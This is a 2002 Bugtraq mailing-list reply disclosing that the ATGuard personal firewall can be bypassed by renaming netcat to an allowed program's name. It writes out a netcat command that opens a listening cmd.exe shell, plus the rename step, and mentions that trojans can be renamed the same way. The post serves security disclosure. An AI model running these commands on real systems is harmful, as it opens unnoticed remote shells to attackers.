Bugtraq mailing list archives
Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible
From: "BlueScreen" <BlueScreen () IT-Checkpoint net>
Date: Tue, 30 Apr 2002 13:40:32 +0200
As far as i see the article you gave me at tooleaky.zensoft.com mostly deals
with outbound connections.
The ATGuard-Problem still goes futher, it is also a problem with inbound
connections.
I use a Xitami Webserver on Port 50080 for testing purposes.
This Xitami Webserver is (currently) allowed to accept all connections on
all ports (this is also a configuration problem,
but most people just allow inbound connections from any address to any port
for an application).
So, i just did the following:
I:\>cd netcat
I:\netcat>nc -e c:\winnt\system32\cmd.exe -p 500 -l
I tried to connect to port 500 with telnet: ATGuard fires up as it is
supposed to. So, now i did the following:
I:\netcat>copy nc.exe xiwin32.exe
1 Datei(en) kopiert. (Translation for the curious non-german
readers : 1 File copied :)
I:\netcat>xiwin32.exe -e c:\winnt\system32\cmd.exe -p 500 -l
Trying it with telnet again, i got a very nice shell without any notice from
ATGuard.
That's why i mentioned also trojan horses in my Advisories - just renaming
your trojan horse to the name of a program that is allowed
to accept inbound connections will do the trick.
There is no ultimate way to control all outbound communication. If you use your own low-level drivers, no personal firewall can stop you.
Surely there is no ultimate way. But if you are not aware that a problem exists, you can't think about solutions. Also, you perhaps will think that your personal firewall is perfectly safe while it isn't. Best regards, ------------------------------------------------------- BlueScreen / Florian Hobelsberger (UIN: 101782087) Member of: www.IT-Checkpoint.net www.Hackeinsteiger.de www.DvLdW.de ================================================================== To encrypt classified messages, please download and use this PGP-Key: http://www.florian-hobelsberger.de/BlueScreen-PGP-PubKey.txt ==================================================================
Current thread:
- ITCP Advisory 13: Bypassing of ATGuard Firewall possible BlueScreen (Apr 29)
- AW: ITCP Advisory 13: Bypassing of ATGuard Firewall possible Jonas Koch (Apr 30)
- Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible BlueScreen (Apr 30)
- Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible Jim Hill (Apr 30)
- <Possible follow-ups>
- Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible UMusBKidN (Apr 30)
- AW: ITCP Advisory 13: Bypassing of ATGuard Firewall possible Jonas Koch (Apr 30)